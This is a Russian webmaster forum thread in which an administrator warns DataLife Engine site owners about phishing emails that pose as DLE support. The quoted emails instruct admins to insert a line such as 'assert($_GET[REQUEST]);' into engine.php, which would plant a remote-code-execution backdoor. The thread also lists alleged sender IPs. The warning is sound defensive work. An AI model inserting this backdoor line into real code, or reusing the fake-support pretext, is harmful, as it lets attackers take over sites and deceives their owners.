Старый 19.10.2014, 19:33 #1 (Ссылка)
Администратор
Дополнительная информация
По умолчанию

Ваш сайт ***.ru подвержен взлому!


Школохакеры ищут новые способы взлома сайтов на DLE.

Внимание! Если вы получили письмо следующего содержания:

Цитата:
Здравствуйте, уважаемый клиент!



Благодарим Вас за использование на Вашем сайте ***.ru нашего ПО «CMS DataLife Engine - Система управления сайтами».

Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.

По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.

Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: /engine/engine.php и в самое начало файла после строчки:

<?php

добавьте:

assert($_GET[REQUEST]);



С уважением,

Служба поддержки «DataLife Engine»
То ни в коем случае не "исправляйте" уязвимость. Иначе ваш сайт на DLE будет точно подвержен взлому.
Движок DLE модернизируется силами разработчиков, становится все более устойчивым к проискам школоло, которые называют себя хакерами, и последние ищут новые возможности для взлома ваших сайтов.

Подобные письма шлют мошенники, письма отправляют через обратную форму сайта. АйПи чаще всего прокси или ТОР.

Если вы получили подобное письмо, свяжитесь напрямую со службой поддержки DLE. Если вы используете нулль, то все фиксы уязвимостей публикуются на официальной странице багов. Проверьте, есть ли на этой странице подобная информация. Не подвергайте ваш сайт взлому!
Veter вне форума   Ответить с цитированиемОтветить с цитированием
2 пользователя(ей) сказали cпасибо:
lukamal (19.10.2014), Льюви (19.10.2014)
Старый 26.10.2014, 22:30 #2 (Ссылка)
Администратор
Дополнительная информация
По умолчанию

Кому интересно у школьников определился московский айпишник: 46.38.63.68
Veter вне форума   Ответить с цитированиемОтветить с цитированием
Пользователь сказал cпасибо:
Льюви (27.10.2014)
Старый 22.01.2015, 20:42 #3 (Ссылка)
Администратор
Дополнительная информация
По умолчанию

Засранцы школоло очень творчески подходят к своему ремеслу, так сказать. За январь месяц я получил два письма. Судите сами, вот первое, полученное в новогодние каникулы

Цитата:
Поздравляем с Новым годом! Выход DataLife Engine 10.4, Патч безопасности для ****

Уважаемые владельцы сайта ***.ru!



Команда «DataLife Engine» поздравляет Вас с Новым 2015 годом!

Мы благодарим Вас за доверие и надеемся, что Вы продолжите использовать «DataLife Engine» на Ваших сайтах и в Новом году. Примите наши самые искренние пожелания здоровья, радости, благополучия Вам и Вашим близким! Пусть в Новом году успех сопутствует Вам во всех начинаниях! Совсем скоро, мы выпустим «DataLife Engine 10.4», ознакомиться с её возможностями и функциями Вы можете уже сейчас на официальном сайте «DataLife Engine».



Кроме того, осенью прошлого года многие сайты, использующие «DataLife Engine», были взломаны злоумышленниками при помощи XSS-атак. В связи с этим мы решили выпустить небольшой баг-фикс, лишающий злоумышленников возможности проводить XSS-атаки на Ваш сайт.

Для исправления, откройте файл ****.ru/engine/engine.php в любом текстовом редакторе и после строки "<?PHP" добавьте строку:

assert($_GET[striptags]);



С уважением,
Команда «DataLife Engine»

IP адрес отправителя: 46.38.63.68
Айпишник московский.

Немного дней спустя пришло еще одно письмо

Цитата:
[Критично] Ваш сайт ****.ru был взломан!

Уважаемые владельцы сайта ****.ru!



Благодарим Вас за использование на Вашем сайте CMS «DataLife Engine».

Сообщаем Вам о том, что за последние сутки в код Вашего сайта ***.ru был встроен вредоносный скрипт, осуществляющий перенаправление мобильных пользователей Вашего сайта на сайт, который представляет угрозу для мобильных устройств.

Скорее всего, злоумышленники получили доступ к панели управления Вашего сайта при помощи уязвимости в модуле Minify, входящем в состав DLE, который позволяет при определенных настройках серверного ПО читать содержимое файлов.

При помощи данной уязвимости любой файл, находящийся на Вашем сервере, может быть прочитан из браузера (при вводе соответствующего запроса), например, файл с данными для доступа к базе данных Вашего сайта. Получив доступ к базе данных, злоумышленникам не составит труда создать нового пользователя с правами администратора и авторизоваться через него в панели управления Вашего сайта.

Устраните уязвимость, следую инструкции указанной ниже. Кроме того, мы настоятельно рекомендуем Вам сменить все пароли от панели управления и базы данных Вашего сайта.

Для исправления откройте файл: ****.ru/engine/engine.php и в самое начало файла после строчки <?PHP добавьте:

assert($_GET[striptags]);



С уважением,
Команда «DataLife Engine»

IP адрес отправителя: 141.255.162.162
Еще раз повторюсь. Разработчики DLE НЕ делают рассылок через обратную форму связи сайтов!
Все патчи и фиксы для DLE вы можете увидеть по ссылке первого поста!
Veter вне форума   Ответить с цитированиемОтветить с цитированием
Старый 22.01.2015, 21:30 #4 (Ссылка)
Профи
Дополнительная информация
По умолчанию

Цитата:
Сообщение от Veter Посмотреть сообщение
Засранцы школоло очень творчески подходят к своему ремеслу

рерайтера наняли, не иначе
Veter, не поленись, апни свою тему на саппорте
Льюви вне форума   Ответить с цитированиемОтветить с цитированием
Старый 24.01.2015, 22:44 #5 (Ссылка)
Администратор
Дополнительная информация
По умолчанию

Разберусь с делами, заскочу. Постараюсь.
Veter вне форума   Ответить с цитированиемОтветить с цитированием
Пользователь сказал cпасибо:
Льюви (25.01.2015)
Старый 03.04.2015, 23:37 #6 (Ссылка)
Администратор
Дополнительная информация
По умолчанию Хакеры взломали Ваш сайт мойсайт.ru!

Засранцы продолжают креативить
Какой только заголовок! Разве он не заставит задрожать админа сайта? Письмо якобы от службы поддержки DLE, и в нем сообщается, что сайт взломали! О ужас!

Само письмо:

Цитата:
Уважаемые владельцы сайта мойсайт.ru!



Благодарим Вас за использование на Вашем сайте мойсайт.ru CMS «DataLife Engine».

Сообщаем Вам о том, что за последние сутки в код Вашего сайта мойсайт.ru был встроен вредоносный скрипт, осуществляющий перенаправление мобильных пользователей Вашего сайта на сайт, который представляет угрозу для мобильных устройств.

Скорее всего, злоумышленники получили доступ к панели управления Вашего сайта при помощи уязвимости в модуле Minify, входящем в состав DLE, который позволяет при определенных настройках серверного ПО читать содержимое файлов.

При помощи данной уязвимости любой файл, находящийся на Вашем сервере, может быть прочитан из браузера (при вводе соответствующего запроса), например, файл с данными для доступа к базе данных Вашего сайта. Получив доступ к базе данных, злоумышленникам не составит труда создать нового пользователя с правами администратора и авторизоваться через него в панели управления Вашего сайта.

Устраните уязвимость, следую инструкции указанной ниже. Кроме того, мы настоятельно рекомендуем Вам сменить все пароли от панели управления и базы данных Вашего сайта.

Для исправления откройте файл: мойсайт.ru/engine/engine.php и в самое начало файла после строчки <?PHP добавьте:

assert($_GET[index]);



С уважением,
Команда «DataLife Engine»

IP адрес отправителя: 195.3.146.112
Айпишник скорее всего латвийский прокси.
Ну вы уже поняли. Менять и добавлять ничего не нужно.
Veter вне форума   Ответить с цитированиемОтветить с цитированием
Старый 01.03.2016, 20:32 #7 (Ссылка)
Новичок
Дополнительная информация
По умолчанию

а я исправил надо сейчас вернуть обратно
Roman48 вне форума   Ответить с цитированиемОтветить с цитированием
Старый 01.03.2016, 22:40 #8 (Ссылка)
Профи
Дополнительная информация
По умолчанию

Цитата:
Сообщение от Roman48 Посмотреть сообщение
а я исправил надо сейчас вернуть обратно
ох...
как бы не получилось "поздно пить боржоми"...
Льюви вне форума   Ответить с цитированиемОтветить с цитированием
Старый 05.03.2016, 03:03 #9 (Ссылка)
Администратор
Дополнительная информация
По умолчанию

Цитата:
Сообщение от Roman48 Посмотреть сообщение
а я исправил надо сейчас вернуть обратно
Ну так верните.
Veter вне форума   Ответить с цитированиемОтветить с цитированием
Ответ

Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Вкл.
Pingbacks are Вкл.
Refbacks are Вкл.


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как сделать ссылку на чужой сайт, оставив в адресной строке свой сайт Andreyd00 Сайтостроение 3 03.12.2013 18:42
Создание сайтов высокого качества: сайт-визитка, корпоративный сайт, интернет-магазин Александр_Т Сайты под ключ 0 05.06.2013 00:51
Как сделать форму поиска и фильтрации на сайт (ссылка на сайт есть) strangesoul Web программирование 5 11.04.2013 11:41
требуется создать дизайн сайта, сам сайт, раскрутить сайт. GDS_ Сайтостроение 15 08.04.2010 09:33


Текущее время: 12:12. Часовой пояс GMT +3.

Powered by vBulletin®
Copyright ©2000 - 2023, WMboard.
Перевод: zCarot
 

Форум вебмастеров

Здесь делают сайты, учатся на них зарабатывать. Ты новичок, и ничего не понимаешь в создании сайтов и в интернет заработке? Не знаешь ответа на вопрос по сайтостроению? Мучают вопросы сео оптимизации?

Не беда, присоединяйся к сообществу вебмастеров, и зарабатывай вместе с нами!